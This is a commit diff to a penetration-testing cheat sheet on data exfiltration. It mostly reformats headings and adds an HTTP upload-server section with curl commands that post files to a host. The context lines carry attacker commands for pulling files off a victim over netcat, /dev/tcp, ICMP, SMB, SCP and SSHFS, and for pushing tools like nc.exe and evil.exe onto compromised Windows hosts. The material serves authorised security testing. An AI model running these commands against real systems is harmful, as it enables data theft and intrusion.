Add exfiltration HTTP upload file module

+ Enhance layout
2023-03-15 13:03:23 +01:00 · 2023-03-15 13:03:23 +01:00 · 9a964a3bc7
commit 9a964a3bc7
parent 3b21650868
1 changed files with 37 additions and 25 deletions
--- a/generic-methodologies-and-resources/exfiltration.md
+++ b/generic-methodologies-and-resources/exfiltration.md
@ -17,7 +17,7 @@

 {% embed url="https://go.intigriti.com/hacktricks" %}

-### Copy\&Paste Base64
+## Copy\&Paste Base64

 **Linux**

@ -33,7 +33,7 @@ certutil -encode payload.dll payload.b64
 certutil -decode payload.b64 payload.dll
 ```

-### HTTP
+## HTTP

 **Linux**

@ -61,13 +61,25 @@ Start-BitsTransfer -Source $url -Destination $output
 Start-BitsTransfer -Source $url -Destination $output -Asynchronous
 ```

-#### Upload files
+### Upload files

-[**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
+- [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
+- [**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149)
+- Python module [uploadserver](https://pypi.org/project/uploadserver/): 
+```bash
+# Listen to files
+python3 -m pip install --user uploadserver
+python3 -m uploadserver
+# With basic auth: 
+# python3 -m uploadserver --basic-auth hello:world

-[**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149)\*\*\*\*
+# Send a file
+curl -X POST http://HOST/upload -H -F 'files=@file.txt' 
+# With basic auth:
+# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world
+```

-#### **HTTPS Server**
+### **HTTPS Server**

 ```python
 # from https://gist.github.com/dergachev/7028596
@ -110,23 +122,23 @@ if __name__ == "__main__":
 ###
 ```

-### FTP
+## FTP

-#### FTP server (python)
+### FTP server (python)

 ```bash
 pip3 install pyftpdlib
 python3 -m pyftpdlib -p 21
 ```

-#### FTP server (NodeJS)
+### FTP server (NodeJS)

 ```
 sudo npm install -g ftp-srv --save
 ftp-srv ftp://0.0.0.0:9876 --root /tmp
 ```

-#### FTP server (pure-ftp)
+### FTP server (pure-ftp)

 ```bash
 apt-get update && apt-get install pure-ftp
@ -146,7 +158,7 @@ chown -R ftpuser:ftpgroup /ftphome/
 /etc/init.d/pure-ftpd restart
 ```

-#### **Windows** client
+### **Windows** client

 ```bash
 #Work well with python. With pure-ftp use fusr:ftp
@ -164,7 +176,7 @@ ftp -n -v -s:ftp.txt

 {% embed url="https://go.intigriti.com/hacktricks" %}

-### SMB
+## SMB

 Kali as server

@ -202,7 +214,7 @@ WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.1
 WindPS-2> cd new_disk:
 ```

-### SCP
+## SCP

 The attacker has to have SSHd running.

@ -210,7 +222,7 @@ The attacker has to have SSHd running.
 scp <username>@<Attacker_IP>:<directory>/<filename> 
 ```

-### SSHFS
+## SSHFS

 If the victim has SSH, the attacker can mount a directory from the victim to the attacker.

@ -220,23 +232,23 @@ sudo mkdir /mnt/sshfs
 sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/
 ```

-### NC
+## NC

 ```bash
 nc -lvnp 4444 > new_file
 nc -vn <IP> 4444 < exfil_file
 ```

-### /dev/tcp
+## /dev/tcp

-#### Download file from victim
+### Download file from victim

 ```bash
 nc -lvnp 80 > file #Inside attacker
 cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
 ```

-#### Upload file to victim
+### Upload file to victim

 ```bash
 nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
@ -247,7 +259,7 @@ cat <&6 > file.txt

 thanks to **@BinaryShadow\_**

-### **ICMP**
+## **ICMP**

 ```bash
 # To exfiltrate the content of a file via pings you can do:
@ -267,7 +279,7 @@ def process_packet(pkt):
 sniff(iface="tun0", prn=process_packet)
 ```

-### **SMTP**
+## **SMTP**

 If you can send data to an SMTP server, you can create an SMTP to receive the data with python:

@ -275,7 +287,7 @@ If you can send data to an SMTP server, you can create an SMTP to receive the da
 sudo python -m smtpd -n -c DebuggingServer :25
 ```

-### TFTP
+## TFTP

 By default in XP and 2003 (in others it needs to be explicitly added during installation)

@ -301,7 +313,7 @@ In **victim**, connect to the Kali server:
 tftp -i <KALI-IP> get nc.exe
 ```

-### PHP
+## PHP

 Download a file with a PHP oneliner:

@ -309,7 +321,7 @@ Download a file with a PHP oneliner:
 echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
 ```

-### VBScript
+## VBScript

 ```bash
 Attacker> python -m SimpleHTTPServer 80
@ -349,7 +361,7 @@ echo ts.Close >> wget.vbs
 cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
 ```

-### Debug.exe
+## Debug.exe

 This is a crazy technique that works on Windows 32 bit machines. The idea is to use the `debug.exe` program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take binaries, like `netcat`. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with `debug.exe`.

@ -367,7 +379,7 @@ wine exe2bat.exe nc.exe nc.txt

 Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe

-### DNS
+## DNS

 * [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)